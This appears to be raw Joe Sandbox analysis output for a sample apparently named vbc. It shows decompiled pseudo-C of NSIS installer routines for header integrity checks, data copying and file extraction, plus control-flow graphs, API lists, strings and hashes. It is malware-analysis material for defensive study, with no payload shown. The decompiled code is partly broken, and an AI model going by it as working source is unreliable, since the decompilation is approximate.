                                                • Instruction Fuzzy Hash: F561A670140300BED721AF66ED46F2B3A6CEB84B5AF40453FF945B62E2CB7D59018A6D
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Control-flow Graph

                                                • Executed
                                                • Not Executed
                                                control_flow_graph 375 40307d-4030cb GetTickCount GetModuleFileNameW call 40602d 378 4030d7-403105 call 40653d call 405e58 call 40653d GetFileSize 375->378 379 4030cd-4030d2 375->379 387 4031f0-4031fe call 403019 378->387 388 40310b 378->388 380 4032ad-4032b1 379->380 395 403200-403203 387->395 396 403253-403258 387->396 390 403110-403127 388->390 392 403129 390->392 393 40312b-403134 call 4034cf 390->393 392->393 400 40325a-403262 call 403019 393->400 401 40313a-403141 393->401 398 403205-40321d call 4034e5 call 4034cf 395->398 399 403227-403251 GlobalAlloc call 4034e5 call 4032b4 395->399 396->380 398->396 422 40321f-403225 398->422 399->396 426 403264-403275 399->426 400->396 404 403143-403157 call 405fe8 401->404 405 4031bd-4031c1 401->405 410 4031cb-4031d1 404->410 424 403159-403160 404->424 409 4031c3-4031ca call 403019 405->409 405->410 409->410 417 4031e0-4031e8 410->417 418 4031d3-4031dd call 4069f7 410->418 417->390 425 4031ee 417->425 418->417 422->396 422->399 424->410 428 403162-403169 424->428 425->387 429 403277 426->429 430 40327d-403282 426->430 428->410 431 40316b-403172 428->431 429->430 432 403283-403289 430->432 431->410 434 403174-40317b 431->434 432->432 433 40328b-4032a6 SetFilePointer call 405fe8 432->433 437 4032ab 433->437 434->410 436 40317d-40319d 434->436 436->396 438 4031a3-4031a7 436->438 437->380 439 4031a9-4031ad 438->439 440 4031af-4031b7 438->440 439->425 439->440 440->410 441 4031b9-4031bb 440->441 441->410
                                                C-Code - Quality: 78%
                                                			E0040307D(void* __eflags, signed int _a4) {
                                                				DWORD* _v8;
                                                				DWORD* _v12;
                                                				void* _v16;
                                                				intOrPtr _v20;
                                                				char _v24;
                                                				intOrPtr _v28;
                                                				intOrPtr _v32;
                                                				intOrPtr _v36;
                                                				intOrPtr _v40;
                                                				signed int _v44;
                                                				long _t50;
                                                				void* _t53;
                                                				void* _t57;
                                                				intOrPtr* _t59;
                                                				long _t60;
                                                				long _t70;
                                                				signed int _t77;
                                                				intOrPtr _t80;
                                                				long _t82;
                                                				void* _t85;
                                                				signed int _t87;
                                                				void* _t89;
                                                				long _t90;
                                                				long _t93;
                                                				void* _t94;
                                                
                                                				_t82 = 0;
                                                				_v12 = 0;
                                                				_v8 = 0;
                                                				 *0x434f0c = GetTickCount() + 0x3e8;
                                                				GetModuleFileNameW(0, 0x443800, 0x400);
                                                				_t89 = E0040602D(0x443800, 0x80000000, 3);
                                                				_v16 = _t89;
                                                				 *0x40a018 = _t89;
                                                				if(_t89 == 0xffffffff) {
                                                					return L"Error launching installer";
                                                				}
                                                				E0040653D(0x441800, 0x443800);
                                                				E0040653D(0x444000, E00405E58(0x441800));
                                                				_t50 = GetFileSize(_t89, 0);
                                                				 *0x42aa24 = _t50;
                                                				_t93 = _t50;
                                                				if(_t50 <= 0) {
                                                					L24:
                                                					E00403019(1);
                                                					if( *0x434f14 == _t82) {
                                                						goto L29;
                                                					}
                                                					if(_v8 == _t82) {
                                                						L28:
                                                						_t34 =  &_v24; // 0x40387d
                                                						_t53 = GlobalAlloc(0x40,  *_t34); // executed
                                                						_t94 = _t53;
                                                						E004034E5( *0x434f14 + 0x1c);
                                                						_t35 =  &_v24; // 0x40387d
                                                						_push( *_t35);
                                                						_push(_t94);
                                                						_push(_t82);
                                                						_push(0xffffffff); // executed
                                                						_t57 = E004032B4(); // executed
                                                						if(_t57 == _v24) {
                                                							 *0x434f10 = _t94;
                                                							 *0x434f18 =  *_t94;
                                                							if((_v44 & 0x00000001) != 0) {
                                                								 *0x434f1c =  *0x434f1c + 1;
                                                							}
                                                							_t40 = _t94 + 0x44; // 0x44
                                                							_t59 = _t40;
                                                							_t85 = 8;
                                                							do {
                                                								_t59 = _t59 - 8;
                                                								 *_t59 =  *_t59 + _t94;
                                                								_t85 = _t85 - 1;
                                                							} while (_t85 != 0);
                                                							_t60 = SetFilePointer(_v16, _t82, _t82, 1); // executed
                                                							 *(_t94 + 0x3c) = _t60;
                                                							E00405FE8(0x434f20, _t94 + 4, 0x40);
                                                							return 0;
                                                						}
                                                						goto L29;
                                                					}
                                                					E004034E5( *0x41ea18);
                                                					if(E004034CF( &_a4, 4) == 0 || _v12 != _a4) {
                                                						goto L29;
                                                					} else {
                                                						goto L28;
                                                					}
                                                				} else {
                                                					do {
                                                						_t90 = _t93;
                                                						asm("sbb eax, eax");
                                                						_t70 = ( ~( *0x434f14) & 0x00007e00) + 0x200;
                                                						if(_t93 >= _t70) {
                                                							_t90 = _t70;
                                                						}
                                                						if(E004034CF(0x416a18, _t90) == 0) {
                                                							E00403019(1);
                                                							L29:
                                                							return L"Installer integrity check has failed. Common causes include\nincomplete download and damaged media. Contact the\ninstaller\'s author to obtain a new copy.\n\nMore information at:\nhttp://nsis.sf.net/NSIS_Error";
                                                						}
                                                						if( *0x434f14 != 0) {
                                                							if((_a4 & 0x00000002) == 0) {
                                                								E00403019(0);
                                                							}
                                                							goto L20;
                                                						}
                                                						E00405FE8( &_v44, 0x416a18, 0x1c);
                                                						_t77 = _v44;
                                                						if((_t77 & 0xfffffff0) == 0 && _v40 == 0xdeadbeef && _v28 == 0x74736e49 && _v32 == 0x74666f73 && _v36 == 0x6c6c754e) {
                                                							_a4 = _a4 | _t77;
                                                							_t87 =  *0x41ea18; // 0x1629b
                                                							 *0x434fa0 =  *0x434fa0 | _a4 & 0x00000002;
                                                							_t80 = _v20;
                                                							 *0x434f14 = _t87;
                                                							if(_t80 > _t93) {
                                                								goto L29;
                                                							}
                                                							if((_a4 & 0x00000008) != 0 || (_a4 & 0x00000004) == 0) {
                                                								_v8 = _v8 + 1;
                                                								_t93 = _t80 - 4;
                                                								if(_t90 > _t93) {
                                                									_t90 = _t93;
                                                								}
                                                								goto L20;
                                                							} else {
                                                								break;
                                                							}
                                                						}
                                                						L20:
                                                						if(_t93 <  *0x42aa24) {
                                                							_v12 = E004069F7(_v12, 0x416a18, _t90);
                                                						}
                                                						 *0x41ea18 =  *0x41ea18 + _t90;
                                                						_t93 = _t93 - _t90;
                                                					} while (_t93 != 0);
                                                					_t82 = 0;
                                                					goto L24;
                                                				}
                                                			}




























                                                0x00403085
                                                0x00403088
                                                0x0040308b
                                                0x004030a5
                                                0x004030aa
                                                0x004030bd
                                                0x004030c2
                                                0x004030c5
                                                0x004030cb
                                                0x00000000
                                                0x004030cd
                                                0x004030de
                                                0x004030ef
                                                0x004030f6
                                                0x004030fe
                                                0x00403103
                                                0x00403105
                                                0x004031f0
                                                0x004031f2
                                                0x004031fe
                                                0x00000000
                                                0x00000000
                                                0x00403203
                                                0x00403227
                                                0x00403227
                                                0x0040322c
                                                0x00403232
                                                0x0040323d
                                                0x00403242
                                                0x00403242
                                                0x00403245
                                                0x00403246
                                                0x00403247
                                                0x00403249
                                                0x00403251
                                                0x00403268
                                                0x00403270
                                                0x00403275
                                                0x00403277
                                                0x00403277
                                                0x0040327f
                                                0x0040327f
                                                0x00403282
                                                0x00403283
                                                0x00403283
                                                0x00403286
                                                0x00403288
                                                0x00403288
                                                0x00403292
                                                0x00403298
                                                0x004032a6
                                                0x00000000
                                                0x004032ab
                                                0x00000000
                                                0x00403251
                                                0x0040320b
                                                0x0040321d
                                                0x00000000
                                                0x00000000
                                                0x00000000
                                                0x00000000
                                                0x0040310b
                                                0x00403110
                                                0x00403115
                                                0x00403119
                                                0x00403120
                                                0x00403127
                                                0x00403129
                                                0x00403129
                                                0x00403134
                                                0x0040325c
                                                0x00403253
                                                0x00000000
                                                0x00403253
                                                0x00403141
                                                0x004031c1
                                                0x004031c5
                                                0x004031ca
                                                0x00000000
                                                0x004031c1
                                                0x0040314a
                                                0x0040314f
                                                0x00403157
                                                0x0040317d
                                                0x00403183
                                                0x0040318c
                                                0x00403192
                                                0x00403197
                                                0x0040319d
                                                0x00000000
                                                0x00000000
                                                0x004031a7
                                                0x004031af
                                                0x004031b2
                                                0x004031b7
                                                0x004031b9
                                                0x004031b9
                                                0x00000000
                                                0x00000000
                                                0x00000000
                                                0x00000000
                                                0x004031a7
                                                0x004031cb
                                                0x004031d1
                                                0x004031dd
                                                0x004031dd
                                                0x004031e0
                                                0x004031e6
                                                0x004031e6
                                                0x004031ee
                                                0x00000000
                                                0x004031ee

                                                APIs
                                                • GetTickCount.KERNEL32(74EDD4C4,C:\Users\user\AppData\Local\Temp\,00000000,?,?,?,?,?,0040387D,?), ref: 0040308E
                                                • GetModuleFileNameW.KERNEL32(00000000,00443800,00000400,?,?,?,?,?,0040387D,?), ref: 004030AA
                                                  • Part of subcall function 0040602D: GetFileAttributesW.KERNELBASE(00000003,004030BD,00443800,80000000,00000003,?,?,?,?,?,0040387D,?), ref: 00406031
                                                  • Part of subcall function 0040602D: CreateFileW.KERNELBASE(?,?,00000001,00000000,?,00000001,00000000), ref: 00406053
                                                • GetFileSize.KERNEL32(00000000,00000000,00444000,00000000,00441800,00441800,00443800,00443800,80000000,00000003,?,?,?,?,?,0040387D), ref: 004030F6
                                                • GlobalAlloc.KERNELBASE(00000040,}8@,?,?,?,?,?,0040387D,?), ref: 0040322C
                                                Strings
                                                • Inst, xrefs: 00403162
                                                • soft, xrefs: 0040316B
                                                • C:\Users\user\AppData\Local\Temp\, xrefs: 00403084
                                                • Null, xrefs: 00403174
                                                • Error launching installer, xrefs: 004030CD
                                                • }8@, xrefs: 00403227, 00403242
                                                • Installer integrity check has failed. Common causes includeincomplete download and damaged media. Contact theinstaller's author , xrefs: 00403253
                                                Memory Dump Source
                                                • Source File: 00000004.00000002.680171348.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000004.00000002.680167485.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000004.00000002.680176661.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000004.00000002.680179731.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000004.00000002.680203041.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000004.00000002.680205712.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000004.00000002.680210866.0000000000442000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000004.00000002.680213751.000000000044C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_4_2_400000_vbc.jbxd
                                                Similarity
                                                • API ID: File$AllocAttributesCountCreateGlobalModuleNameSizeTick
                                                • String ID: C:\Users\user\AppData\Local\Temp\$Error launching installer$Inst$Installer integrity check has failed. Common causes includeincomplete download and damaged media. Contact theinstaller's author $Null$soft$}8@
                                                • API String ID: 2803837635-3947366757
                                                • Opcode ID: b2925046ebf4ee23c20be954f21b6b8de3b8febbf6f0f410cc7df6a070a5bb34
                                                • Instruction ID: 750c061bb954c4555836cecba7cc54c639b148d890841a972b43b12454d44aa7
                                                • Opcode Fuzzy Hash: b2925046ebf4ee23c20be954f21b6b8de3b8febbf6f0f410cc7df6a070a5bb34
                                                • Instruction Fuzzy Hash: 7951B571904204AFDB10AF65ED42B9E7EACAB48756F14807BF904B62D1C77C9F408B9D
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Control-flow Graph

                                                • Executed
                                                • Not Executed
                                                control_flow_graph 727 4032b4-4032cb 728 4032d4-4032dd 727->728 729 4032cd 727->729 730 4032e6-4032eb 728->730 731 4032df 728->731 729->728 732 4032fb-403308 call 4034cf 730->732 733 4032ed-4032f6 call 4034e5 730->733 731->730 737 4034bd 732->737 738 40330e-403312 732->738 733->732 739 4034bf-4034c0 737->739 740 403468-40346a 738->740 741 403318-403361 GetTickCount 738->741 742 4034c8-4034cc 739->742 745 4034aa-4034ad 740->745 746 40346c-40346f 740->746 743 4034c5 741->743 744 403367-40336f 741->744 743->742 747 403371 744->747 748 403374-403382 call 4034cf 744->748 749 4034b2-4034bb call 4034cf 745->749 750 4034af 745->750 746->743 751 403471 746->751 747->748 748->737 760 403388-403391 748->760 749->737 761 4034c2 749->761 750->749 752 403474-40347a 751->752 755 40347c 752->755 756 40347e-40348c call 4034cf 752->756 755->756 756->737 764 40348e-40349a call 4060df 756->764 763 403397-4033b7 call 406a65 760->763 761->743 769 403460-403462 763->769 770 4033bd-4033d0 GetTickCount 763->770 771 403464-403466 764->771 772 40349c-4034a6 764->772 769->739 773 4033d2-4033da 770->773 774 40341b-40341d 770->774 771->739 772->752 777 4034a8 772->777 778 4033e2-403413 MulDiv wsprintfW call 40559f 773->778 779 4033dc-4033e0 773->779 775 403454-403458 774->775 776 40341f-403423 774->776 775->744 782 40345e 775->782 780 403425-40342c call 4060df 776->780 781 40343a-403445 776->781 777->743 786 403418 778->786 779->774 779->778 787 403431-403433 780->787 785 403448-40344c 781->785 782->743 785->763 788 403452 785->788 786->774 787->771 789 403435-403438 787->789 788->743 789->785
                                                C-Code - Quality: 95%
                                                			E004032B4(int _a4, intOrPtr _a8, intOrPtr _a12, int _a16, signed char _a19) {
                                                				signed int _v8;
                                                				int _v12;
                                                				intOrPtr _v16;
                                                				long _v20;
                                                				intOrPtr _v24;
                                                				short _v152;
                                                				void* _t65;
                                                				long _t70;
                                                				intOrPtr _t75;
                                                				long _t76;
                                                				intOrPtr _t77;
                                                				void* _t78;
                                                				int _t88;
                                                				intOrPtr _t92;
                                                				intOrPtr _t95;
                                                				long _t96;
                                                				signed int _t97;
                                                				int _t98;
                                                				int _t99;
                                                				intOrPtr _t100;
                                                				void* _t101;
                                                				void* _t102;
                                                
                                                				_t97 = _a16;
                                                				_t92 = _a12;
                                                				_v12 = _t97;
                                                				if(_t92 == 0) {
                                                					_v12 = 0x8000;
                                                				}
                                                				_v8 = _v8 & 0x00000000;
                                                				_v16 = _t92;
                                                				if(_t92 == 0) {
                                                					_v16 = 0x422a20;
                                                				}
                                                				_t62 = _a4;
                                                				if(_a4 >= 0) {
                                                					E004034E5( *0x434f58 + _t62);
                                                				}
                                                				if(E004034CF( &_a16, 4) == 0) {
                                                					L41:
                                                					_push(0xfffffffd);
                                                					goto L42;
                                                				} else {
                                                					if((_a19 & 0x00000080) == 0) {
                                                						if(_t92 != 0) {
                                                							if(_a16 < _t97) {
                                                								_t97 = _a16;
                                                							}
                                                							if(E004034CF(_t92, _t97) != 0) {
                                                								_v8 = _t97;
                                                								L44:
                                                								return _v8;
                                                							} else {
                                                								goto L41;
                                                							}
                                                						}
                                                						if(_a16 <= _t92) {
                                                							goto L44;
                                                						}
                                                						_t88 = _v12;
                                                						while(1) {
                                                							_t98 = _a16;
                                                							if(_a16 >= _t88) {
                                                								_t98 = _t88;
                                                							}
                                                							if(E004034CF(0x41ea20, _t98) == 0) {
                                                								goto L41;
                                                							}
                                                							if(E004060DF(_a8, 0x41ea20, _t98) == 0) {
                                                								L28:
                                                								_push(0xfffffffe);
                                                								L42:
                                                								_pop(_t65);
                                                								return _t65;
                                                							}
                                                							_v8 = _v8 + _t98;
                                                							_a16 = _a16 - _t98;
                                                							if(_a16 > 0) {
                                                								continue;
                                                							}
                                                							goto L44;
                                                						}
                                                						goto L41;
                                                					}
                                                					_t70 = GetTickCount();
                                                					 *0x40d384 =  *0x40d384 & 0x00000000;
                                                					 *0x40d380 =  *0x40d380 & 0x00000000;
                                                					_t14 =  &_a16;
                                                					 *_t14 = _a16 & 0x7fffffff;
                                                					_v20 = _t70;
                                                					 *0x40ce68 = 8;
                                                					 *0x416a10 = 0x40ea08;
                                                					 *0x416a0c = 0x40ea08;
                                                					 *0x416a08 = 0x416a08;
                                                					_a4 = _a16;
                                                					if( *_t14 <= 0) {
                                                						goto L44;
                                                					} else {
                                                						goto L9;
                                                					}
                                                					while(1) {
                                                						L9:
                                                						_t99 = 0x4000;
                                                						if(_a16 < 0x4000) {
                                                							_t99 = _a16;
                                                						}
                                                						if(E004034CF(0x41ea20, _t99) == 0) {
                                                							goto L41;
                                                						}
                                                						_a16 = _a16 - _t99;
                                                						 *0x40ce58 = 0x41ea20;
                                                						 *0x40ce5c = _t99;
                                                						while(1) {
                                                							_t95 = _v16;
                                                							 *0x40ce60 = _t95;
                                                							 *0x40ce64 = _v12;
                                                							_t75 = E00406A65(0x40ce58);
                                                							_v24 = _t75;
                                                							if(_t75 < 0) {
                                                								break;
                                                							}
                                                							_t100 =  *0x40ce60; // 0x425a20
                                                							_t101 = _t100 - _t95;
                                                							_t76 = GetTickCount();
                                                							_t96 = _t76;
                                                							if(( *0x434fb4 & 0x00000001) != 0 && (_t76 - _v20 > 0xc8 || _a16 == 0)) {
                                                								wsprintfW( &_v152, L"... %d%%", MulDiv(_a4 - _a16, 0x64, _a4));
                                                								_t102 = _t102 + 0xc;
                                                								E0040559F(0,  &_v152); // executed
                                                								_v20 = _t96;
                                                							}
                                                							if(_t101 == 0) {
                                                								if(_a16 > 0) {
                                                									goto L9;
                                                								}
                                                								goto L44;
                                                							} else {
                                                								if(_a12 != 0) {
                                                									_t77 =  *0x40ce60; // 0x425a20
                                                									_v8 = _v8 + _t101;
                                                									_v12 = _v12 - _t101;
                                                									_v16 = _t77;
                                                									L23:
                                                									if(_v24 != 1) {
                                                										continue;
                                                									}
                                                									goto L44;
                                                								}
                                                								_t78 = E004060DF(_a8, _v16, _t101); // executed
                                                								if(_t78 == 0) {
                                                									goto L28;
                                                								}
                                                								_v8 = _v8 + _t101;
                                                								goto L23;
                                                							}
                                                						}
                                                						_push(0xfffffffc);
                                                						goto L42;
                                                					}
                                                					goto L41;
                                                				}
                                                			}

























                                                0x004032bf
                                                0x004032c3
                                                0x004032c6
                                                0x004032cb
                                                0x004032cd
                                                0x004032cd
                                                0x004032d4
                                                0x004032d8
                                                0x004032dd
                                                0x004032df
                                                0x004032df
                                                0x004032e6
                                                0x004032eb
                                                0x004032f6
                                                0x004032f6
                                                0x00403308
                                                0x004034bd
                                                0x004034bd
                                                0x00000000
                                                0x0040330e
                                                0x00403312
                                                0x0040346a
                                                0x004034ad
                                                0x004034af
                                                0x004034af
                                                0x004034bb
                                                0x004034c2
                                                0x004034c5
                                                0x00000000
                                                0x00000000
                                                0x00000000
                                                0x00000000
                                                0x004034bb
                                                0x0040346f
                                                0x00000000
                                                0x00000000
                                                0x00403471
                                                0x00403474
                                                0x00403477
                                                0x0040347a
                                                0x0040347c
                                                0x0040347c
                                                0x0040348c
                                                0x00000000
                                                0x00000000
                                                0x0040349a
                                                0x00403464
                                                0x00403464
                                                0x004034bf
                                                0x004034bf
                                                0x00000000
                                                0x004034bf
                                                0x0040349c
                                                0x0040349f
                                                0x004034a6
                                                0x00000000
                                                0x00000000
                                                0x00000000
                                                0x004034a8
                                                0x00000000
                                                0x00403474
                                                0x0040331e
                                                0x00403320
                                                0x00403327
                                                0x0040332e
                                                0x0040332e
                                                0x00403335
                                                0x0040333d
                                                0x00403347
                                                0x0040334c
                                                0x00403354
                                                0x0040335e
                                                0x00403361
                                                0x00000000
                                                0x00000000
                                                0x00000000
                                                0x00000000
                                                0x00403367
                                                0x00403367
                                                0x00403367
                                                0x0040336f
                                                0x00403371
                                                0x00403371
                                                0x00403382
                                                0x00000000
                                                0x00000000
                                                0x00403388
                                                0x0040338b
                                                0x00403391
                                                0x00403397
                                                0x00403397
                                                0x004033a2
                                                0x004033a8
                                                0x004033ad
                                                0x004033b4
                                                0x004033b7
                                                0x00000000
                                                0x00000000
                                                0x004033bd
                                                0x004033c3
                                                0x004033c5
                                                0x004033ce
                                                0x004033d0
                                                0x00403401
                                                0x00403407
                                                0x00403413
                                                0x00403418
                                                0x00403418
                                                0x0040341d
                                                0x00403458
                                                0x00000000
                                                0x00000000
                                                0x00000000
                                                0x0040341f
                                                0x00403423
                                                0x0040343a
                                                0x0040343f
                                                0x00403442
                                                0x00403445
                                                0x00403448
                                                0x0040344c
                                                0x00000000
                                                0x00000000
                                                0x00000000
                                                0x00403452
                                                0x0040342c
                                                0x00403433
                                                0x00000000
                                                0x00000000
                                                0x00403435
                                                0x00000000
                                                0x00403435
                                                0x0040341d
                                                0x00403460
                                                0x00000000
                                                0x00403460
                                                0x00000000
                                                0x00403367

                                                APIs
                                                • GetTickCount.KERNEL32(000000FF,00000004,00000000,00000000,00000000), ref: 0040331E
                                                • GetTickCount.KERNEL32(0040CE58,0041EA20,00004000), ref: 004033C5
                                                • MulDiv.KERNEL32 ref: 004033EE
                                                • wsprintfW.USER32 ref: 00403401
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000004.00000002.680171348.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000004.00000002.680167485.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000004.00000002.680176661.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000004.00000002.680179731.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000004.00000002.680203041.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000004.00000002.680205712.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000004.00000002.680210866.0000000000442000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000004.00000002.680213751.000000000044C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_4_2_400000_vbc.jbxd
                                                Similarity
                                                • API ID: CountTick$wsprintf
                                                • String ID: *B$ ZB$ A$ A$... %d%%$}8@
                                                • API String ID: 551687249-3683892814
                                                • Opcode ID: d1cfd4714e4687a3a26bd4ac3846c46955ae89f51795138bd42b88bfc39313c7
                                                • Instruction ID: 54ab186c05730647c672001b6e56d135182c7b51176e178f40f708a1e84a381e
                                                • Opcode Fuzzy Hash: d1cfd4714e4687a3a26bd4ac3846c46955ae89f51795138bd42b88bfc39313c7
                                                • Instruction Fuzzy Hash: E251BD31810219EBCF11DF65DA44B9E7BB8AF05756F10827BE804BB2C1D7789E44CBA9
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Control-flow Graph

                                                • Executed
                                                • Not Executed
                                                control_flow_graph 790 40176f-401794 call 402da6 call 405e83 795 401796-40179c call 40653d 790->795 796 40179e-4017b0 call 40653d call 405e0c lstrcatW 790->796 801 4017b5-4017b6 call 4067c4 795->801 796->801 805 4017bb-4017bf 801->805 806 4017c1-4017cb call 406873 805->806 807 4017f2-4017f5 805->807 815 4017dd-4017ef 806->815 816 4017cd-4017db CompareFileTime 806->816 808 4017f7-4017f8 call 406008 807->808 809 4017fd-401819 call 40602d 807->809 808->809 817 40181b-40181e 809->817 818 40188d-4018b6 call 40559f call 4032b4 809->818 815->807 816->815 819 401820-40185e call 40653d * 2 call 40657a call 40653d call 405b9d 817->819 820 40186f-401879 call 40559f 817->820 830 4018b8-4018bc 818->830 831 4018be-4018ca SetFileTime 818->831 819->805 852 401864-401865 819->852 832 401882-401888 820->832 830->831 834 4018d0-4018db CloseHandle 830->834 831->834 835 402c33 832->835 838 4018e1-4018e4 834->838 839 402c2a-402c2d 834->839 837 402c35-402c39 835->837 841 4018e6-4018f7 call 40657a lstrcatW 838->841 842 4018f9-4018fc call 40657a 838->842 839->835 849 401901-402398 841->849 842->849 853 40239d-4023a2 849->853 854 402398 call 405b9d 849->854 852->832 855 401867-401868 852->855 853->837 854->853 855->820
                                                C-Code - Quality: 75%
                                                			E0040176F(FILETIME* __ebx, void* __eflags) {
                                                				void* __esi;
                                                				void* _t35;
                                                				void* _t43;
                                                				void* _t45;
                                                				FILETIME* _t51;
                                                				FILETIME* _t64;
                                                				void* _t66;
                                                				signed int _t72;
                                                				FILETIME* _t73;
                                                				FILETIME* _t77;
                                                				signed int _t79;
                                                				WCHAR* _t81;
                                                				void* _t83;
                                                				void* _t84;
                                                				void* _t86;
                                                
                                                				_t77 = __ebx;
                                                				 *(_t86 - 8) = E00402DA6(0x31);
                                                				 *(_t86 + 8) =  *(_t86 - 0x30) & 0x00000007;
                                                				_t35 = E00405E83( *(_t86 - 8));
                                                				_push( *(_t86 - 8));
                                                				_t81 = L"Call";
                                                				if(_t35 == 0) {
                                                					lstrcatW(E00405E0C(E0040653D(_t81, 0x441000)), ??);
                                                				} else {
                                                					E0040653D();
                                                				}
                                                				E004067C4(_t81);
                                                				while(1) {
                                                					__eflags =  *(_t86 + 8) - 3;
                                                					if( *(_t86 + 8) >= 3) {
                                                						_t66 = E00406873(_t81);
                                                						_t79 = 0;
                                                						__eflags = _t66 - _t77;
                                                						if(_t66 != _t77) {
                                                							_t73 = _t66 + 0x14;
                                                							__eflags = _t73;
                                                							_t79 = CompareFileTime(_t73, _t86 - 0x24);
                                                						}
                                                						asm("sbb eax, eax");
                                                						_t72 =  ~(( *(_t86 + 8) + 0xfffffffd | 0x80000000) & _t79) + 1;
                                                						__eflags = _t72;
                                                						 *(_t86 + 8) = _t72;
                                                					}
                                                					__eflags =  *(_t86 + 8) - _t77;
                                                					if( *(_t86 + 8) == _t77) {
                                                						E00406008(_t81);
                                                					}
                                                					__eflags =  *(_t86 + 8) - 1;
                                                					_t43 = E0040602D(_t81, 0x40000000, (0 |  *(_t86 + 8) != 0x00000001) + 1);
                                                					__eflags = _t43 - 0xffffffff;
                                                					 *(_t86 - 0x38) = _t43;
                                                					if(_t43 != 0xffffffff) {
                                                						break;
                                                					}
                                                					__eflags =  *(_t86 + 8) - _t77;
                                                					if( *(_t86 + 8) != _t77) {
                                                						E0040559F(0xffffffe2,  *(_t86 - 8));
                                                						__eflags =  *(_t86 + 8) - 2;
                                                						if(__eflags == 0) {
                                                							 *((intOrPtr*)(_t86 - 4)) = 1;
                                                						}
                                                						L31:
                                                						 *0x434f88 =  *0x434f88 +  *((intOrPtr*)(_t86 - 4));
                                                						__eflags =  *0x434f88;
                                                						goto L32;
                                                					} else {
                                                						E0040653D("C:\Users\Albus\AppData\Local\Temp\nspDD94.tmp", _t83);
                                                						E0040653D(_t83, _t81);
                                                						E0040657A(_t77, _t81, _t83, "C:\Users\Albus\AppData\Local\Temp\nspDD94.tmp\System.dll",  *((intOrPtr*)(_t86 - 0x1c)));
                                                						E0040653D(_t83, "C:\Users\Albus\AppData\Local\Temp\nspDD94.tmp");
                                                						_t64 = E00405B9D("C:\Users\Albus\AppData\Local\Temp\nspDD94.tmp\System.dll",  *(_t86 - 0x30) >> 3) - 4;
                                                						__eflags = _t64;
                                                						if(_t64 == 0) {
                                                							continue;
                                                						} else {
                                                							__eflags = _t64 == 1;
                                                							if(_t64 == 1) {
                                                								 *0x434f88 =  &( *0x434f88->dwLowDateTime);
                                                								L32:
                                                								_t51 = 0;
                                                								__eflags = 0;
                                                							} else {
                                                								_push(_t81);
                                                								_push(0xfffffffa);
                                                								E0040559F();
                                                								L29:
                                                								_t51 = 0x7fffffff;
                                                							}
                                                						}
                                                					}
                                                					L33:
                                                					return _t51;
                                                				}
                                                				E0040559F(0xffffffea,  *(_t86 - 8)); // executed
                                                				 *0x434fb4 =  *0x434fb4 + 1;
                                                				_t45 = E004032B4( *((intOrPtr*)(_t86 - 0x28)),  *(_t86 - 0x38), _t77, _t77); // executed
                                                				 *0x434fb4 =  *0x434fb4 - 1;
                                                				__eflags =  *(_t86 - 0x24) - 0xffffffff;
                                                				_t84 = _t45;
                                                				if( *(_t86 - 0x24) != 0xffffffff) {
                                                					L22:
                                                					SetFileTime( *(_t86 - 0x38), _t86 - 0x24, _t77, _t86 - 0x24); // executed
                                                				} else {
                                                					__eflags =  *((intOrPtr*)(_t86 - 0x20)) - 0xffffffff;
                                                					if( *((intOrPtr*)(_t86 - 0x20)) != 0xffffffff) {
                                                						goto L22;
                                                					}
                                                				}
                                                				CloseHandle( *(_t86 - 0x38)); // executed
                                                				__eflags = _t84 - _t77;
                                                				if(_t84 >= _t77) {
                                                					goto L31;
                                                				} else {
                                                					__eflags = _t84 - 0xfffffffe;
                                                					if(_t84 != 0xfffffffe) {
                                                						E0040657A(_t77, _t81, _t84, _t81, 0xffffffee);
                                                					} else {
                                                						E0040657A(_t77, _t81, _t84, _t81, 0xffffffe9);
                                                						lstrcatW(_t81,  *(_t86 - 8));
                                                					}
                                                					_push(0x200010);
                                                					_push(_t81);
                                                					E00405B9D();
                                                					goto L29;
                                                				}
                                                				goto L33;
                                                			}


















                                                0x0040176f
                                                0x00401776
                                                0x00401782
                                                0x00401785
                                                0x0040178a
                                                0x0040178d
                                                0x00401794
                                                0x004017b0
                                                0x00401796
                                                0x00401797
                                                0x00401797
                                                0x004017b6
                                                0x004017bb
                                                0x004017bb
                                                0x004017bf
                                                0x004017c2
                                                0x004017c7
                                                0x004017c9
                                                0x004017cb
                                                0x004017d0
                                                0x004017d0
                                                0x004017db
                                                0x004017db
                                                0x004017ec
                                                0x004017ee
                                                0x004017ee
                                                0x004017ef
                                                0x004017ef
                                                0x004017f2
                                                0x004017f5
                                                0x004017f8
                                                0x004017f8
                                                0x004017ff
                                                0x0040180e
                                                0x00401813
                                                0x00401816
                                                0x00401819
                                                0x00000000
                                                0x00000000
                                                0x0040181b
                                                0x0040181e
                                                0x00401874
                                                0x00401879
                                                0x004015b6
                                                0x0040292e
                                                0x0040292e
                                                0x00402c2a
                                                0x00402c2d
                                                0x00402c2d
                                                0x00000000
                                                0x00401820
                                                0x00401826
                                                0x0040182d
                                                0x0040183a
                                                0x00401845
                                                0x0040185b
                                                0x0040185b
                                                0x0040185e
                                                0x00000000
                                                0x00401864
